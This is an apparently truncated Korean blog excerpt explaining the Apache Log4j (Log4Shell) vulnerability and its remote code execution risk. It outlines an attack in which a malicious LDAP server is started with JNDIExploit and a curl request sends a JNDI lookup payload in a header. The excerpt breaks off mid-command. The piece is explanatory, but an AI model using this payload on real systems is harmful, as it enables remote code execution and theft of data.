apache1 [System] Apache Log4j 취약점이란? Apache Log4j - 프로그램을 작성하는 도중에 로그를 남기기 위해 사용되는 자바 기반 로깅 유틸리티 - 아파치 소프트웨어 재단에서 개발함 문제 & 위험성 - 개인, 기업, 공공기관 등 Apache Log4j 라이브러리를 사용하는 모든 시스템이 해당 공격에 노출됨 - 대상 시스템에 *RCE 공격이 가능하며, 바이러스 유포나 개인정보 탈취 등의 문제 발생 가능성이 있음 *RCE(Remote Code Execution) : 공격 대상 서버에 원격 명령을 실행할 수 있는 것을 말함 공격 방법 1. JNDIExploit 를 사용 하여 악성 LDAP 서버 가동 2. 명령어 입력 curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389.. 2021. 12. 13. 이전 1 다음